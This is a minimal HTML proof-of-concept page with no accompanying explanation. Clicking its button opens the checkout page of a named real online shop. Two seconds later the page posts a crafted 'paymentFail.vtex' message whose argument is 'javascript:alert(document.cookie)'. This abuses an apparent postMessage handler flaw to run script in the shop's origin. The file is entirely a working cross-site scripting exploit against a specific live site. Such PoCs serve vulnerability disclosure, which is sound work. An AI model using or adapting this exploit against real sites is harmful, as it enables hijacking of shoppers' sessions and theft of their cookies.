<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <button id="test">Click here</button>
    <script>
    function poc() {
        var w = window.open("https://tienda.tork.mx/checkout/")
        setTimeout(function(){w.postMessage({"event":"paymentFail.vtex","arguments":["javascript:alert(document.cookie)"]},"*");}, 2000);
    };
    document.getElementById("test").addEventListener("click", poc);
    </script>
</body>
</html>
